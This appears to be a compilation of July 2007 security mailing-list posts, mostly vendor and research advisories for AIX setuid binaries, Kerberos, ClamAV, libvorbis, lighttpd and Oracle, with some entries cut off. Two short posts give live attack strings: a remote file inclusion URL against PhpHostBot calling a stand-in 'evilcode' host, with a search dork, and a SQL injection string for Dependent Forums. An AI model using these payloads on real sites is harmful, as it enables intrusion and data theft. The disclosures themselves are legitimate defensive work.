iDefense Security Advisory 07.26.07: IBM AIX capture Terminal Control Sequence Buffer Overflow Vulnerability
IBM AIX capture Terminal Control Sequence Buffer Overflow Vulnerability iDefense Security Advisory 07.26.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 26, 2007 I. BACKGROUND The capture program is a setuid root application, installed by default under multiple versions of IBM AIX, that allows terminal sessions to be dumped to a file. More information can be found at the following URL. http://publib.boulder.ibm.com/infocenter/pseries/v5r3/topic/com.ibm.aix.cmds/doc/aixcmds1/capture.htm II. DESCRIPTION Local exploitation of a stack-based buffer overflow vulnerability in the 'capture' program, as included with IBM Corp.'s AIX operating system, allows an attacker to execute arbitrary code with root privileges. The vulnerability exists within the code that parses terminal control sequences. A long series of control sequences will trigger an exploitable stack-based buffer overflow. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with root privileges. The capture program is setuid root, and executable by any user with local access. The vulnerability is a stack-based buffer overflow, and is trivially exploitable. IV. DETECTION iDefense has confirmed the existence of this vulnerability in AIX version 5.3 with service pack 6. Previous versions may also be affected. V. WORKAROUND Removing the setuid bit from the binary will prevent exploitation, but may make the program unusable by non-root users. VI. VENDOR RESPONSE IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007- to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/05/2007 Initial vendor notification 06/08/2007 Initial vendor response 07/26/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
FLEA-2007-0034-1:
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0034-1 Published: 2007-07-26 Rating: Major Updated Versions: lighttpd=/[EMAIL PROTECTED]:devel//1/1.4.15-0.3-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.6-2 References: https://issues.rpath.com/browse/RPL-1550 https://issues.rpath.com/browse/RPL-1554 Description: Previous versions of the lighttpd package are vulnerable to multiple attacks, among which remote attackers may circumvent access-control settings or crash the server by issuing various malformed or malicious requests. It has not been determined that these vulnerabilities can be exploited to execute malicious code. lighttpd is configured to be the default web server for the Foresight System Manager. If a malicious user were to cause a Denial of Service via the above attack vectors, the system would no longer be configurable or updateable via the System Manager. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) iQIVAwUBRqjDLNfwEn07iAtZAQJ/GBAAhfGTlgT8142XQZNzLd2LcWBDHdRJBUZE ciGE5gcXsD+d/ixh592s+ET4eP9NkjrMKgH42fqW/KN9vEJ5WhZ/0s3dGojiGBEs FsxU+DFWAa7ACLUt83Izm39HBrHtanzwrHHddkXIkF04Dcv12HoK/1g4imTLFQ9p 3NICH6n/S8G4idpIotbxVvBa+AU7rM/x0m/Ekits8fDybSrFYhLyyWVELWUUB8ww sxxnCmUfCTw6t4YgTud8BEuEf2zaGNPKybfydCVKpk6YtDzepuS+bDsblDmStA7f O8pcwz20s8hIspchf9hAeGjsuLYW+oteEuLWcbYmbTd6nNUzk+rh62CwZrrsrsJQ Ws0vb7fC8wbKlVwUuA746vM0JxPl5b3VeqDSRvc8olRnzx72f4LyGYSsoENxTgv+ toI9RSkAt1/Hl8gcika1tpQ+s8Rex90sBlT47W7kIaD2WP2OqmvR5hpPqusqLA/l mwi+f0tE/kTAL4vFXOH5+GSTA9q+x6pg0JNhCh/V97Z9RWmVenRoLtxbuznsryez td+l7fCpkk5950sBWnHCRTdPlrGrumgu9sx7/ZpSYdizqSnSXj8Jex/f2oS6KNG6 8O8BSbdcg5579k7zMzmRC+6IMWlloJToEZ8lbE230JKiXaeVIojprA/i0kRtFzv6 kbnZjntvOCg= =N9w3 -END PGP SIGNATURE-
RE: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities
-Original Message- From: Williams, James K Sent: Tuesday, July 24, 2007 7:56 PM To: 'bugtraq@securityfocus.com' Subject: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities Title: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities [...] CVE References: CVE-2006-5645, CVE-2007-3875 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5645 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3875 [...] FYI - one of the CVE links above is incorrect. The correct URL is: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5645 Regards, Ken Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
[ GLSA 200707-11 ] MIT Kerberos 5: Arbitrary remote code execution
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: MIT Kerberos 5: Arbitrary remote code execution Date: July 25, 2007 Bugs: #183338 ID: 200707-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in MIT Kerberos 5 could potentially result in remote code execution with root privileges by unauthenticated users. Background == MIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-crypt/mit-krb5 1.5.2-r3 = 1.5.2-r3 Description === kadmind is affected by multiple vulnerabilities in the RPC library shipped with MIT Kerberos 5. It fails to properly handle zero-length RPC credentials (CVE-2007-2442) and the RPC library can write past the end of the stack buffer (CVE-2007-2443). Furthermore kadmind fails to do proper bounds checking (CVE-2007-2798). Impact == A remote unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code with root privileges. Workaround == There is no known workaround at this time. Resolution == All MIT Kerberos 5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-crypt/mit-krb5-1.5.2-r3 References == [ 1 ] CVE-2007-2442 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442 [ 2 ] CVE-2007-2443 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443 [ 3 ] CVE-2007-2798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200707-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpHiyDY4vKmA.pgp Description: PGP signature
[ MDKSA-2007:150 ] - Updated clamav packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:150 http://www.mandriva.com/security/ ___ Package : clamav Date: July 25, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A vulnerability in the RAR VM in ClamAV allowed user-assisted remote attackers to cause a crash via a crafted RAR archive which resulted in a NULL pointer dereference. Other bugs have also been corrected in 0.91.1 which is being provided with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3725 ___ Updated Packages: Mandriva Linux 2007.0: a1d7123d64b17de98db72e05959657e0 2007.0/i586/clamav-0.91.1-1.1mdv2007.0.i586.rpm 4e814bbff65dc4129f398f72b6d62640 2007.0/i586/clamav-db-0.91.1-1.1mdv2007.0.i586.rpm c6267bcae66562a2458cf9ad5d6de8f4 2007.0/i586/clamav-milter-0.91.1-1.1mdv2007.0.i586.rpm 1f263279bf4cd5460786fe0759c0ec96 2007.0/i586/clamd-0.91.1-1.1mdv2007.0.i586.rpm 0b14d3e33ba65c556cbea0dd4b55a51c 2007.0/i586/clamdmon-0.91.1-1.1mdv2007.0.i586.rpm 2bd3ff262e1f1b5d261e2aa986d23ad5 2007.0/i586/libclamav2-0.91.1-1.1mdv2007.0.i586.rpm b9b0dac5eccf1000b8301187bcad99b2 2007.0/i586/libclamav2-devel-0.91.1-1.1mdv2007.0.i586.rpm d1b697088a726c293ee54cc25b660308 2007.0/SRPMS/clamav-0.91.1-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c0b6dc4ec4ab20dba0129966d42cd75e 2007.0/x86_64/clamav-0.91.1-1.1mdv2007.0.x86_64.rpm 8c28b0917575a5b0f2306f6c30d35df8 2007.0/x86_64/clamav-db-0.91.1-1.1mdv2007.0.x86_64.rpm fbf470d9921d86b6cfbf0b75a8723f71 2007.0/x86_64/clamav-milter-0.91.1-1.1mdv2007.0.x86_64.rpm 9dbff52f73edb4b10efa681b2c3b6b38 2007.0/x86_64/clamd-0.91.1-1.1mdv2007.0.x86_64.rpm 60f9f0b6e869e4931ea6a5e1521d079b 2007.0/x86_64/clamdmon-0.91.1-1.1mdv2007.0.x86_64.rpm 4de72c8d9cd714e0b1b7d9d1aadcb131 2007.0/x86_64/lib64clamav2-0.91.1-1.1mdv2007.0.x86_64.rpm 63dc325ae89be61dca20128ae021a812 2007.0/x86_64/lib64clamav2-devel-0.91.1-1.1mdv2007.0.x86_64.rpm d1b697088a726c293ee54cc25b660308 2007.0/SRPMS/clamav-0.91.1-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 5044c759d6cad93402ddd5350262f5fb 2007.1/i586/clamav-0.91.1-1.1mdv2007.1.i586.rpm 9fdbb064de5d4752bf29b68edf86c9b7 2007.1/i586/clamav-db-0.91.1-1.1mdv2007.1.i586.rpm 0bb59e9542365b9bd1faf3cdb041e1d1 2007.1/i586/clamav-milter-0.91.1-1.1mdv2007.1.i586.rpm 2f95a4750b57cd52a8f8fe30ff62ad85 2007.1/i586/clamd-0.91.1-1.1mdv2007.1.i586.rpm 33548bc49879899559d5700f7ec0add2 2007.1/i586/clamdmon-0.91.1-1.1mdv2007.1.i586.rpm 4dc6d180ee9e306fa5eb3a1dfe81aa9e 2007.1/i586/libclamav2-0.91.1-1.1mdv2007.1.i586.rpm f2e5333e7c60c9cbc7b70f3994a867c3 2007.1/i586/libclamav2-devel-0.91.1-1.1mdv2007.1.i586.rpm fdb6ea9465c87b3206051df922e509d0 2007.1/SRPMS/clamav-0.91.1-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 15b628de57bf9b067dfe17e4050eae06 2007.1/x86_64/clamav-0.91.1-1.1mdv2007.1.x86_64.rpm f53ae231e7591079b7a9f88c948527d5 2007.1/x86_64/clamav-db-0.91.1-1.1mdv2007.1.x86_64.rpm be2c036992c7ebd82ffdc45e4679c83c 2007.1/x86_64/clamav-milter-0.91.1-1.1mdv2007.1.x86_64.rpm cabcdcf73a9e49ead2db583e1a55af71 2007.1/x86_64/clamd-0.91.1-1.1mdv2007.1.x86_64.rpm 8f8e068f16c979be31d688069c76b797 2007.1/x86_64/clamdmon-0.91.1-1.1mdv2007.1.x86_64.rpm c37ebfab59ca964727252852af351988 2007.1/x86_64/lib64clamav2-0.91.1-1.1mdv2007.1.x86_64.rpm 744eaf423e847ad4ed1204cfde0bac22 2007.1/x86_64/lib64clamav2-devel-0.91.1-1.1mdv2007.1.x86_64.rpm fdb6ea9465c87b3206051df922e509d0 2007.1/SRPMS/clamav-0.91.1-1.1mdv2007.1.src.rpm Corporate 3.0: 3d676fd4f9e9ded80498b13ee9703447 corporate/3.0/i586/clamav-0.91.1-0.1.C30mdk.i586.rpm b9b12ef53061ccf1f695c2fffe6a04bb corporate/3.0/i586/clamav-db-0.91.1-0.1.C30mdk.i586.rpm 24da7dc91cbe989c78c7bdf6dba9e900 corporate/3.0/i586/clamav-milter-0.91.1-0.1.C30mdk.i586.rpm bc9fdfa2c9a6c356f7f14f186d2e57d9 corporate/3.0/i586/clamd-0.91.1-0.1.C30mdk.i586.rpm 3e930ebd2759f14da53b0f2f4d8cf7da corporate/3.0/i586/clamdmon-0.91.1-0.1.C30mdk.i586.rpm 5897ace4abdc86cff7c7f9b073c4a046 corporate/3.0/i586/libclamav2-0.91.1-0.1.C30mdk.i586.rpm 56909a444cdc2b2c60f4c07d8d829034 corporate/3.0/i586/libclamav2-devel-0.91.1-0.1.C30mdk.i586.rpm b1c34cc12fb36c73c469dcfbf4bcaa4e corporate/3.0/SRPMS/clamav-0.91.1-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 1d9868884be1e6222e4161458bb66c26 corporate/3.0/x86_64/clamav-0.91.1-0.1.C30mdk.x86_64.rpm 7cfa0abb1592069c41b7a9e413c9c087 corporate/3.0/x86_64/clamav-db-0.91.1-0.1.C30mdk.x86_64.rpm eebc3cadf53dd91a4ce07e24f52dc769
Guidance Software response to iSEC report on EnCase
Guidance Software Response to iSEC Report Guidance Software received and reviewed the report drafted by two presenters at the upcoming Black Hat USA conference. We have also spoken to Alex Stamos, one of the testing leaders. The report authors disclose that they conducted, over a period of six months, intensive testing utilizing specialized proprietary automated testing software. As a result of this extensive testing regimen, they were able to identify six test scenarios, out of tens of thousands of test scenarios run, that apparently revealed minor bugs in some cases for which there are straightforward workarounds in our EnCase® Forensic Edition software. All of the testing involved intentionally corrupted target data that highlighted a few relatively minor bugs. The issues raised do not identify errors affecting the integrity of the evidence collection or authentication process, or the EnCase Enterprise process (i.e., the operation of the servlet code or the operation of the SAFE server). Moreover, the iss ues raised have nothing to do with the security of the product. Therefore, we strongly dispute any media reports or commentary that imply that there are any vulnerabilities or denials of service exposed by this report. Forensic examiners will inevitably come across corrupted data on target systems from time to time; and in standard computer forensics training, including classes offered by Guidance Software, examiners are trained to account for such issues. In addition, while Guidance Software maintains a robust in-house quality assurance process and strives to make our software as stable as possible, no software is completely crash-proof and there will always be anomalies, particularly involving extreme scenarios of corrupted target data. The following are the six anomalies raised by the report and our brief response to them: 1. [Logical] Disk Image Cannot be Acquired With Certain Corrupted MBR Partition Table. Response: It should be no surprise to any computer forensic examiner that a logical copy of a volume may not be possible if that volume has a corrupted MBR Partition table. EnCase features an option to acquire the target media physically, rather than logically, to specifically account for this type of scenario. The authors ignored the option of acquiring the data physically. Also, by corrupting the MBR Partition table, the perpetrator would likely render his computer inoperable, which calls into question both the likelihood and feasibility of such a tactic. 2. Corrupted NTFS file system crashed EnCase during acquisition. Response: The authors state that this issue appears to be caused by an attempt to read past the end of the buffer. However, EnCase features an option to de-select the automatic reading of the file system during the acquisition process. Thus, there is an easy work-around. Also, by corrupting the NTFS partitions, the perpetrator would likely render his file system dysfunctional, which calls into question both the likelihood and feasibility of such a tactic. Thus, the chances of this specific scenario occurring in the field are extremely remote; however, Guidance Software will test and, if verified, place this anomaly in its development queue to address the crashing problem in the future. 3. Corrupted Microsoft Exchange database crashes EnCase during multi-threaded search/analysis concurrent to acquisition Response: The report discloses that this particular anomaly occurred only when every single check box was selected in the search dialogue box, including the search, hash value calculation and verify file signatures features. This means that EnCase was directed to acquire an Exchange database and perform a detailed multi-threaded search and analysis of the data at the same time. This procedure is extremely inconsistent with best practices and akin to opening several hundred files in a word processing program, which of course would cause a memory overload. 4. Corrupted NTFS file systems Causes Memory Error Response: As noted above, corrupted files or file systems can create challenges. The authors themselves note that the bug is minor, stating that they have not found any ill effects caused by this error condition other than an error being displayed and corrupted records not being displayed. In addition, they noted that they are unaware of any exploitable condition that arises from this error. 5. EnCase Had Difficulty Reading Intentionally Corrupted NTFS File System Directory. Response: This issue involves the authors intentionally corrupting an NTFS file system to create a loop by, replacing a directory entry for a file with a reference to the directorys parent directory. Experienced forensic examiners are trained to identify such instances of data cloaking. The purposeful hiding of data by the subject of an investigation is in itself important evidence
SolpotCrew Advisory #14 (S4M3K) - PhpHostBot (login_form) Remote File Inclusion
+ + PhpHostBot (login_form) Remote File Inclusion + + Download link : http://www.idevspot.com/PhpHostBot.php + + + + + Bug Found By :S4M3K (24-07-2007) + + contact: [EMAIL PROTECTED] + + Website : http://www.m3ks.org/adv/m3ks-adv-24.7.07.txt + + + + Greetz: Scr3W_W0rM, Nyubi, Home_edition2001, Dj-RuFfy, TOMMY_PENGAMEN, th0nk, + iFX, Cookie, VanDaMe, Dead + All member on #nyubicrew @irc.mildnet.org + + + Exploitation: + + http://[target]/[path]/library/authorize.php?login_form=http://evilcode? + + + + google dork : PhpHostBot ; inurl:PhpHostBot + + +
Re: Mozilla protocol abuse
Since I published this report it has come to my attention that Thunderbird 1.5, unlike Thunderbird 2.0, has not been patched with the osint security flag. As such all Thunderbird 1.5 users are vulnerable against this attack and those exploits. Now would be a good time to upgrade to Thunderbird 2.0. http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/ Regards Thor Larholm Thor Larholm wrote: The Mozilla application platform currently has an unpatched input validation flaw which allows you to specify arbitrary command line arguments to any registered URL protocol handler process. Jesper Johansson already detailed parts of this on his blog on July 20, http://msinfluentials.com/blogs/jesper/. I wrote a vulnerability report on July 18 together with a proof-of-concept exploit that targeted Thunderbird 2.0.0.4. Thunderbird 2.0.0.5 was released on July 19 and incidentally fixed this specific attack vector through its osint command line flag. It is now 6 days later and people should have had time to update their Thunderbird installations, so I have decided to publish my vulnerability report together with the exploits as they detail how to handle XPI exploitation. The HTML version can be found at http://larholm.com/2007/07/25/mozilla-protocol-abuse/ A ZIP file with the report and the XPI exploits can be found at http://larholm.com/media/2007/7/mozillaprotocolabuse.zip Cheers Thor Larholm
libvorbis 1.1.2 - Multiple memory corruption flaws
iSEC Partners Security Advisory - 2007-003-libvorbis http://www.isecpartners.com libvorbis 1.1.2 - Multiple memory corruption flaws Vendor: Xiph.org Vendor URL: http://www.xiph.org Systems Affected: All tested software based upon libvorbis 1.1.2 Severity: High (Heap corruption, Denial of Service, Potential code execution) Author: David Thiel david[at]isecpartners[dot]com Vendor notified: 2007-06-05 Public release: 2007-07-26 Advisory URL: http://www.isecpartners.com/advisories/2007-003-libvorbis.txt Summary: libvorbis 1.1.2 contains several vulnerabilities allowing heap overwrite, read violations and a function pointer overwrite. These bugs cause a at least a denial of service, and potentially code execution. Details: Invalid blocksize_0 and blocksize_1 values result in a heap overwrite in the _01inverse() function of res0.c. An invalid mapping type causes an out of bounds dispatch table lookup, offset by an attacker-controlled value, during cleanup in vorbis_info_clear() in info.c. Additionally, invalid blocksize values cause a segmentation fault on read in block.c. Fix Information: These issues are resolved in libvorbis 1.2.0, available at: http://downloads.xiph.org/releases/vorbis/libvorbis-1.2.0.tar.bz2 Thanks to: -- Ralph Giles and Xiphmont of Xiph.org for their detailed help determining root causes of and fixes for these issues. About iSEC Partners: iSEC Partners is a full-service security consulting firm that provides penetration testing, secure systems development, security education and software design verification, with offices in San Francisco and Seattle. Information on testing media players and codecs to expose and prevent similar bugs and tools to do the same will be presented at BlackHat USA 2007. http://www.isecpartners.com [EMAIL PROTECTED]
[security bulletin] HPSBMA02133 SSRT061201 rev.5 - HP Oracle for OpenView (OfO) Critical Patch Update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00727143 Version: 5 HPSBMA02133 SSRT061201 rev.5 - HP Oracle for OpenView (OfO) Critical Patch Update NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-07-19 Last Updated: 2007-07-18 Potential Security Impact: Local or remote compromise of confidentiality, availability, integrity. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Oracle® has issued a Critical Patch Update which contains solutions for a number of potential security vulnerabilities. These vulnerabilities may be exploited locally or remotely to compromise the confidentiality, availability or integrity of Oracle for OpenView (OfO). References: Oracle Critical Patch Update - July 2007 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Oracle for OpenView (OfO) v8.1.7 or v9.1.01 or v9.2 running on HP-UX, Tru64 UNIX, Linux, Solaris, and Windows. BACKGROUND For a PGP signed version of this security bulletin please write to: [EMAIL PROTECTED] Oracle is a registered U.S. trademark of the Oracle Corporation, Redwood City, California. Oracle has issued Critical Patch Update - July 2007. For more information: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html Information about previous Oracle Critical Patch Updates can be found here: http://www.oracle.com/technology/deploy/security/alerts.htm The following products are affected: ProductDescription Number ORA200BC OfO v8.1.7 for HP-UX LTU ORA200CA OfO v9.2 64bit HP-UX .11 LTU ORA205BC OfO v8.1.7 for HP-UX 5 LTU Bundle ORA205CA OfO v9.2 64bit HP-UX .11 5 LTUs ORA230BC OfO v8.1.7 for HP-UX Media ORA230CA OfO v9.2 64bit HP-UX .11 Media Kit ORA240BC OfO v8.1.7 for HP-UX Eval LTU Media ORA300BC OfO v8.1.7 for Win 2000/NT LTU ORA300CA OfO v9.2 32bit Windows LTU ORA305BC OfO v8.1.7 for Win 2000/NT 5 LTU Bundle ORA305CA OfO v9.2 32bit Windows 5 LTUs ORA330BC OfO v8.1.7 for Win 2000/NT Media ORA330CA OfO v9.2 32bit Windows Media Kit ORA340BC OfO v8.1.7 for Win 2000/NT Eval LTU ORA400BC OfO v8.1.7 for Sun Solaris LTU ORA400CA OfO v9.2 32bit Sun Solaris 2.72.8 LTU ORA401CA OfO v9.2 64bit Sun Solaris 2.72.8 LTU ORA405BC OfO v8.1.7 for Sun Solaris 5 LTU Bundle ORA405CA OfO v9.2 32bit Sun Solaris 2.72.8 5 LTU ORA406CA OfO v9.2 64bit Sun Solaris 2.72.8 5 LTU ORA430BC OfO v8.1.7 for Sun Solaris Media ORA430CA OfO v9.2 32bit Sun Solaris 2.72.8 Media ORA431CA OfO v9.2 64bit Sun Solaris 2.72.8 Media ORA440BC OfO v8.1.7 for Sun Solaris Eval LTU ORA500CA OfO v9.1.01 64bit Tru64 V5.1a LTU Ent.Ed ORA505CA OfO v9.1.01 64bit Tru64 V5.1a LTU ORA530CA OfO v9.1.01 64bit Tru64 V5.1a Media Kit ORA600CA OfO for Linux LTU ORA605CA OfO for Linux LTU Service Bureaus Bundle ORA630CA OfO v9.2.0 for Linux, Media Kit AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 === action: If Oracle for OpenView (OfO) is installed, install the Oracle Critical Patch Update - July 2007 END AFFECTED VERSIONS Note: Since Oracle for OpenView (OfO) is not installed using swinstall(1M) the Security Patch Check Tool cannot determine whether it is present on an HP-UX system. Customer maintained configuration documentation should be consulted to determine whether Oracle for OpenView (OfO) is installed. RESOLUTION Oracle for OpenView (OfO) customers who have support contracts directly with Oracle should obtain the Critical Patch Update - July 2007 from Oracle. Oracle for OpenView (OfO) customers who have support with Hewlett-Packard should contact their normal support channel to obtain the Critical Patch Update - July 2007. For support contract information, please visit: http://www.hp.com/managementsoftware/contract_maint MANUAL ACTIONS : Yes - Update Install the Oracle Critical Patch Update - July 2007. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa HISTORY Version:1 (rev.1) - 19 July 2006 Initial release Critical Patch Update - July 2006 Version:2 (rev.2) - 23 October 2006 Critical Patch Update - October 2006 is available Version:3 (rev.3) - 22 January 2007 Critical Patch Update - January 2007 is available Version:4 (rev.4) - 18 April 2007 Critical Patch Update - April 2007 is available Version:5 (rev.5) - 18 July 2007 Critical Patch Update - July 2007 is available Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in
iDefense Security Advisory 07.26.07: IBM AIX ftp gets() Multiple Buffer Overflow Vulnerabilities
IBM AIX ftp gets() Multiple Buffer Overflow Vulnerabilities iDefense Security Advisory 07.26.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 26, 2007 I. BACKGROUND The ftp program is a client application for accessing data stored on FTP servers. This client is responsible for interfacing with users and speaking the FTP protocol with remote servers. Under AIX, the ftp program is installed by default and is setuid root. More information can be found at the following URL. http://publib.boulder.ibm.com/infocenter/pseries/v5r3/topic/com.ibm.aix.cmds/doc/aixcmds2/ftp.htm II. DESCRIPTION Local exploitation of multiple buffer overflow vulnerabilities in the 'ftp' program, as included with IBM Corp.'s AIX operating system, allow an attacker to execute arbitrary code with root privileges. These vulnerabilities exist due to several calls to the gets() function. The gets() function is a deprecated C library function used to read data from standard input into a buffer. This function provides no way to specify the maximum size of the buffer being read into, and therefore allows the buffer to be overflowed. III. ANALYSIS Exploitation of any of these vulnerabilities results in the execution of arbitrary code with root privileges. The ftp program is setuid root, and executable by any user with local access. At least one of these vulnerabilities results in a trivially exploitable stack-based buffer overflow. IV. DETECTION iDefense has confirmed the existence of this vulnerability in AIX version 5.3 with service pack 6. Previous versions may also be affected. V. WORKAROUND Removing the setuid bit from the binary will prevent exploitation, but may make the program unusable by non-root users. VI. VENDOR RESPONSE IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4004 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/05/2007 Initial vendor notification 06/08/2007 Initial vendor response 07/26/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Dependet Forums (Username Field) Remote SQL Injection
_ A R I A - S E C U R I T Y _ Dependet Forums (Username Field) RemotE SQL Injection DORK: Powered by: Dependent Forums v1.02 Insert Your SQL Injection Code into the Username field. For Example ' union select * from members where member=1 Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info
iDefense Security Advisory 07.26.07: IBM AIX pioout Arbitrary Library Loading Vulnerability
IBM AIX pioout Arbitrary Library Loading Vulnerability iDefense Security Advisory 07.26.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 26, 2007 I. BACKGROUND The pioout program is a setuid root application, installed by default under multiple versions of IBM AIX, that is used to interface with the printer driver. More information can be found at the following URL. http://publib.boulder.ibm.com/infocenter/pseries/v5r3/topic/com.ibm.aix.cmds/doc/aixcmds4/pioout.htm II. DESCRIPTION Local exploitation of an arbitrary library loading vulnerability in the 'pioout' program, as included with IBM Corp.'s AIX operating system, allows an attacker to execute arbitrary code with root privileges. The vulnerability exists due to the application loading an arbitrary shared library provided by the attacker, without dropping privileges. Using the -R command line argument, an attacker can specify a shared library used to parse data coming from the printer. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with root privileges. The pioout program is setuid root, and executable by any user with local access. To exploit the vulnerability, all an attacker has to do is create a shared library that executes a shell. IV. DETECTION iDefense has confirmed the existence of this vulnerability in AIX version 5.3 with service pack 6. Previous versions may also be affected. V. WORKAROUND Removing the setuid bit from the binary will prevent exploitation, but may make the program unusable by non-root users. VI. VENDOR RESPONSE IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4003 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/05/2007 Initial vendor notification 06/08/2007 Initial vendor response 07/26/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. 